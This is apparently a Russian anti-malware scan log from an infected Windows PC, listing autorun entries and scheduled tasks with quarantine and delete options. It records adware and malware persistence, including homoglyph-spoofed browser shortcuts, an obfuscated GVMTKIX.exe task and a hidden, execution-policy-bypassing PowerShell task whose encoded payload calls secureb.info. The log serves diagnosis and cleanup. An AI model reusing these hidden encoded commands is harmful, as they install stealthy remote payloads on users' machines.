--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\WacomPen, EventMessageFile
C:\Windows\System32\drivers\wd.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Wd, EventMessageFile
C:\Windows\System32\drivers\Wdf01000.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\wdf01000, EventMessageFile
C:\Windows\System32\wecsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\wecsvc, EventMessageFile
C:\Windows\System32\win32k.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Win32k, EventMessageFile
C:\Program Files (x86)\Windows Defender\MpEvMsg.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\WinDefend, EventMessageFile
C:\Windows\System32\DFDTS.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Windows Disk Diagnostic, EventMessageFile
C:\Windows\system32\w32time.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient, DllName
Удалить
C:\Windows\system32\w32time.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer, DllName
Удалить
C:\Windows\System32\vmictimeprovider.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\VMICTimeProvider, DllName
Удалить
C:\Windows\System32\mctadmin.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_USERS, S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce, mctadmin
Удалить
C:\Windows\System32\mctadmin.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_USERS, S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce, mctadmin
Удалить
C:\Program Files (x86)\BaiduSd3.0\BaiduSd\3.0.0.4605\baidusdTray.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\baidusdTray, command
Удалить
C:\Program Files (x86)\BlueStacks\HD-Agent.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BlueStacks Agent, command
Удалить
C:\Users\Владислав\AppData\Local\Yandex\BrowserManager\BrowserManager.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Browser Manager, command
Удалить
C:\Users\Владислав\AppData\Roaming\daemon2.exe
166.67 кб, rsAh, создан: 18.01.2016 20:33:56, изменен: 18.01.2016 20:33:56, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Daemon, command
Удалить
C:\GameXP\AccessPoint\accesspoint.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GameXP AccessPoint, command
Удалить
C:\Program Files (x86)\Genie Soft\Genie Cleaner\GenieFloater.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GenieFloater, command
Удалить
C:\Program Files (x86)\GetGo Software\GetGo
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GetGoDM, command
Удалить
Manager\GetGo.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GetGoDM, command
Удалить
C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Google Update, command
Удалить
C:\Program Files (x86)\Crossbrowse\Crossbrowse\Application\crossbrowse.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GoogleChromeAutoLaunch_203FD1B6B4F492A0A8A984C446590D7B, command
Удалить
C:\Users\Владислав\AppData\Local\Kometa\Application\kometa.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KometaAutoLaunch_A038D26498222E3AF0B26AC6E0272F6A, command
Удалить
C:\Program Files (x86)\Muzabaza\Muzabaza player\Muzabaza.exe
1832.50 кб, rsAh, создан: 12.11.2013 15:18:46, изменен: 12.11.2013 15:18:46
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Muzbaza, command
Удалить
C:\Program Files (x86)\Pay-By-Ads\Yahoo! Search\1.3.26.12\dsrlte.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Yahoo! Search, command
Удалить
C:\Users\Владислав\AppData\Local\Yandex\Elements\elements.exe\8.7.0.3110\elements64.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\YandexElements, command
Удалить
C:\Users\Владислав\AppData\Local\ZetaGamesNews\zeta.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ZetaGamesNews, command
Удалить
C:\Users\Владислав\AppData\Local\ZetaGamesViewer\zetaviewer.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ZetaGamesViewer, command
Удалить
cmd /c start http://nilavets.ru/?utm_source=uoua03&utm_content=269102ffd6df900960deb96339e07c3b
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\zgtqkznlfp, command
Удалить
C:\Program Files (x86)\Zona\Zona.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Zona, command
Удалить
C:\Windows\System32\TsUsbRedirectionGroupPolicyExtension.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4bcd6cde-777b-48b6-9804-43568e23545d}, DLLName
Удалить
auditcse.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{f3ccc681-b74c-4060-9f26-cd84525dca2a}, DLLName
Удалить
C:\Windows\System32\WUDFHost.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\WUDF\Services\{193a1820-d9ac-4997-8c55-be817523f6aa}, HostProcessImagePath
Удалить
C:\Users\Владислав\Desktop\Counter-Strike\hl.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенЯрлык в папке автозагрузкиC:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Counter-Strike.lnk,
C:\Users\Владислав\AppData\Local\Amigo\Application\amigo.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенЯрлык в папке автозагрузкиC:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gооglе Сhrоmе.lnk,
C:\Users\Владислав\AppData\Local\Yandex\browser.bat --"http://dengi-vnete.net/"
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенЯрлык в папке автозагрузкиC:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Yаndех.lnk,
C:\Users\Владислав\AppData\Local\Yandex\browser.bat
0.17 кб, rsaH, создан: 28.01.2015 16:17:22, изменен: 28.01.2015 16:17:25, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенЯрлык в папке автозагрузкиC:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Yаndех.lnk,
C:\Users\Владислав\AppData\Local\Amigo\Application\amigo.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенЯрлык в папке автозагрузкиC:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Амиго.lnk,
C:\GameXP\AccessPoint\accesspoint.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенЯрлык в папке автозагрузкиC:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Играть! GameXP.lnk,
C:\Users\Владислав\AppData\Local\Amigo\Application\amigo.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенЯрлык в папке автозагрузкиC:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Владислав\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Интернет браузер Phоеniх.lnk,
Обнаружено элементов автозапуска - 745, опознано как безопасные - 476

Модули расширения Internet Explorer (BHO, панели ...)

Имя файлаТипОписаниеПроизводительCLSID

ошибка получения информации о файле
BHO{12E8A6C2-B125-479F-AB3C-13B8757C7F04}
Удалить
Обнаружено элементов - 6, опознано как безопасные - 5

Модули расширения проводника

Имя файлаНазначениеОписаниеПроизводительCLSID

ошибка получения информации о файле
WinRAR shell extension{B41DB860-64E4-11D2-9906-E49FADC173CA}
Удалить

ошибка получения информации о файле
ESET Smart Security - Context Menu Shell Extension{B089FE88-FB52-11D3-BDF1-0050DA34150D}
Удалить

ошибка получения информации о файле
WebCheck{E6FB5E20-DE35-11CF-9C87-00AA005127ED}
Удалить

ошибка получения информации о файле
4shared_Desktop{EBDF1F20-C829-11D1-8233-0020AF3E97A9}
Удалить

ошибка получения информации о файле
Scan with Kaspersky Anti-Virus{dd230880-495a-11d1-b064-008048ec2fc5}
Удалить
Обнаружено элементов - 17, опознано как безопасные - 12

Модули расширения системы печати (мониторы печати, провайдеры)

Имя файлаТипНаименованиеОписаниеПроизводитель
PortMon.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
МониторDPFMaster_Portmon
localspl.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
МониторLocal Port
FXSMON.DLL
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
МониторMicrosoft Shared Fax Monitor
tcpmon.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
МониторStandard TCP/IP Port
usbmon.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
МониторUSB Monitor
WSDMon.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
МониторWSD Port
inetpp.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
ПровайдерHTTP Print Services
Обнаружено элементов - 8, опознано как безопасные - 1

Задания планировщика задач Task Scheduler

Имя файлаИмя заданияСостояние заданияОписаниеПроизводительПутьКомандная строкаТип
C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe
1145.69 кб, rsAh, создан: 10.04.2016 18:36:37, изменен: 10.04.2016 18:36:37
Скрипт: Kарантин, Удалить, Удалить через BC
Adobe Flash Player PPAPI Notifier.job
Скрипт: Удалить
One or more of the properties that are needed to run this task on a schedule have not been set.Adobe® Flash® Player Installer/Uninstaller 21.0 r0Copyright © 1996-2016 Adobe Systems IncorporatedC:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe -check pepperplugin32
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
263.19 кб, rsAh, создан: 10.01.2014 21:40:51, изменен: 10.04.2016 18:36:38
Скрипт: Kарантин, Удалить, Удалить через BC
Adobe Flash Player Updater.job
Скрипт: Удалить
The task is ready to run at its next scheduled time.Adobe® Flash® Player Update Service 21.0 r0Copyright © 1996-2016 Adobe Systems IncorporatedC:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe 32
C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000Core.job
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /c32
C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000UA.job
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler32
C:\Users\?????????\AppData\Roaming\GVMTKIX.exe /infocmdline=RBtWEIvEMoSS4IJ7aTfa9RW57kpXBCx66TjLhMMxOckbqxMKzVBPP/I4UCKuzeL0PaA8POUyFUEdbMSZbOfn5oWDYP7TugnqjNXRK8Bs5Mqs1MCNAu0CrGm+uQwU95kb+Qb/niaeOidoKbMhqKKd2kpZibXi/dptDaLH/qgV7FpEF+cSGrC1bZtrqgpNNk2aglvRwbSITeqEa71lQ+93T85rfM+ZR4kf+Bwqii7N/0Px/yV57J59cj1YTc392Z0DmaWtxAT/3olQe1X553zoMCRXA2pfMw3LB3o8+qbnrMjOkBO+ca4nUtJirVFRnpfILZG31QXkIzqDFW1hGnvr+34hrD9JS8pz5GpbpKAqBA/I2Y8SDdIOGmfQd/R0/T5Anlo3K566BFux8mmsLNXf4nv4xOnNB+akqPmSgXYSIi8Tj35+2RuIHD7VlU7khOx3gRyiNfom/PqVp4ZmhSTEnOlsuxN0fNxohYVIxiEld/0t8acaGrMMEl2Dy9S8r8noqA5POcZgiGcz88A0D/owDv2EW28VYmjIYUpcNAfwwBd8A7nOqSIXtDw3Vqe0JeZHQr6Yp/Ves+OqMM8587Ryv2iCkwpevi6rrr9x9A4crcJfU6S+2xTNAyYBSdpWy9qW1vh9vSUNyhCrdLSjq0PfHww9PoW/hIZdMw4hjfXxM70=
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
GVMTKIX.job
Скрипт: Удалить
The task has not yet run.C:\Users\?????????\AppData\Roaming\GVMTKIX.exe /infocmdline=RBtWEIvEMoSS4IJ7aTfa9RW57kpXBCx66TjLhMMxOckbqxMKzVBPP/I4UCKuzeL0PaA8POUyFUEdbMSZbOfn5oWDYP7TugnqjNXRK8Bs5Mqs1MCNAu0CrGm+uQwU95kb+Qb/niaeOidoKbMhqKKd2kpZibXi/dptDaLH/qgV7FpEF+cSGrC1bZtrqgpNNk2aglvRwbSITeqEa71lQ+93T85rfM+ZR4kf+Bwqii7N/0Px/yV57J59cj1YTc392Z0DmaWtxAT/3olQe1X553zoMCRXA2pfMw3LB3o8+qbnrMjOkBO+ca4nUtJirVFRnpfILZG31QXkIzqDFW1hGnvr+34hrD9JS8pz5GpbpKAqBA/I2Y8SDdIOGmfQd/R0/T5Anlo3K566BFux8mmsLNXf4nv4xOnNB+akqPmSgXYSIi8Tj35+2RuIHD7VlU7khOx3gRyiNfom/PqVp4ZmhSTEnOlsuxN0fNxohYVIxiEld/0t8acaGrMMEl2Dy9S8r8noqA5POcZgiGcz88A0D/owDv2EW28VYmjIYUpcNAfwwBd8A7nOqSIXtDw3Vqe0JeZHQr6Yp/Ves+OqMM8587Ryv2iCkwpevi6rrr9x9A4crcJfU6S+2xTNAyYBSdpWy9qW1vh9vSUNyhCrdLSjq0PfHww9PoW/hIZdMw4hjfXxM70=32
c:\programdata\{6ef5c04c-c64c-f075-6ef5-5c04cc640133}\3113341408602753693e.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
MagicKeys.job
Скрипт: Удалить
One or more of the properties that are needed to run this task on a schedule have not been set.c:\programdata\{6ef5c04c-c64c-f075-6ef5-5c04cc640133}\3113341408602753693e.exe --startup=1 --single32
C:\Program Files (x86)\Media Saver\8W7crcC.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
Update Service for Media Saver.job
Скрипт: Удалить
The task is currently running.C:\Program Files (x86)\Media Saver\8W7crcC.exe 32
C:\Program Files (x86)\Media Saver\8W7crcC.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
Update Service for Media Saver2.job
Скрипт: Удалить
One or more of the properties that are needed to run this task on a schedule have not been set.C:\Program Files (x86)\Media Saver\8W7crcC.exe 32
C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
Update Service for VK Downloader.job
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 32
C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
Update Service for VK Downloader2.job
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 32
C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe
1145.69 кб, rsAh, создан: 10.04.2016 18:36:37, изменен: 10.04.2016 18:36:37
Скрипт: Kарантин, Удалить, Удалить через BC
Adobe Flash Player PPAPI Notifier
Скрипт: Удалить
The task is ready to run at its next scheduled time.Adobe® Flash® Player Installer/Uninstaller 21.0 r0Copyright © 1996-2016 Adobe Systems IncorporatedC:\Windows\system32\Tasks\ C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe -check pepperplugin64
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
263.19 кб, rsAh, создан: 10.01.2014 21:40:51, изменен: 10.04.2016 18:36:38
Скрипт: Kарантин, Удалить, Удалить через BC
Adobe Flash Player Updater
Скрипт: Удалить
The task is ready to run at its next scheduled time.Adobe® Flash® Player Update Service 21.0 r0Copyright © 1996-2016 Adobe Systems IncorporatedC:\Windows\system32\Tasks\ C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe 64
C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000Core
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /c64
C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000UA
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler64
C:\Users\Владислав\AppData\Local\Kometa\kometaup.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
Kometa up
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Users\Владислав\AppData\Local\Kometa\kometaup.exe 64
C:\Users\Владислав\AppData\Local\Mail.Ru\MailRuUpdater.exe
ошибка получения информации о файле, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
MailRuUpdateTask
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Users\Владислав\AppData\Local\Mail.Ru\MailRuUpdater.exe --scheduler64
aitagent
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
AitAgent
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\Microsoft\Windows\Application Experience\ aitagent 64
C:\Windows\ehome\mcupdate
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
mcupdate
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\Microsoft\Windows\Media Center\ %SystemRoot%\ehome\mcupdate $(Arg0)64
C:\Windows\ehome\mcupdate
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
mcupdate_scheduled
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\Microsoft\Windows\Media Center\ %SystemRoot%\ehome\mcupdate -crl -hms -pscn 1564
C:\Windows\ehome\ehrec
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
RecordingRestart
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\Microsoft\Windows\Media Center\ %SystemRoot%\ehome\ehrec /RestartRecording64
C:\Windows\ehome\ehrec
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
StartRecording
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\Microsoft\Windows\Media Center\ %SystemRoot%\ehome\ehrec /StartRecording64
C:\PROGRA~2\Opera\launcher.exe
679.54 кб, rsAh, создан: 09.01.2014 20:11:00, изменен: 24.03.2016 18:50:24
Скрипт: Kарантин, Удалить, Удалить через BC
Opera scheduled Autoupdate 1389276660
Скрипт: Удалить
The task is ready to run at its next scheduled time.Opera Internet BrowserCopyright Opera Software 2016C:\Windows\system32\Tasks\ C:\PROGRA~2\Opera\launcher.exe --scheduledautoupdate $(Arg0)64
C:\Users\Владислав\AppData\Local\Style Mart\Bin\StyleMart.dll
32.50 кб, rsAh, создан: 09.09.2015 15:02:27, изменен: 09.09.2015 15:02:27, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
Style Mart
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Windows\system32\rundll32.exe "C:\Users\Владислав\AppData\Local\Style Mart\Bin\StyleMart.dll",#364
C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
Update Service for VK Downloader
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 64
C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
Update Service for VK Downloader2
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 64
C:\Program Files (x86)\ZetaGames\Upd.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
ZetaUpdate
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Program Files (x86)\ZetaGames\Upd.exe64
C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEQAOQAxAGwAUgBJAEoAdQBzAF8AMABPAGQAOQBpAEUAeQBVAFEAWQBXADQAdABJAEUAeQBmAGIAYQBJADcATABwAHMAdQBYAHgAaABLAGEAXwBrAG4AbgBoAGwAVgBNAEoATABfAFUAYwBYADQAVwBrADMAUgBmAGYASwA2AFEAWQAyADcAUQBiADgASgAtAGoAVABNAGkAQgB4AE0ARQBHAEoANgBiAGwAaAB4AGQAdgBhAFYAOAAwADgASQB2AGwA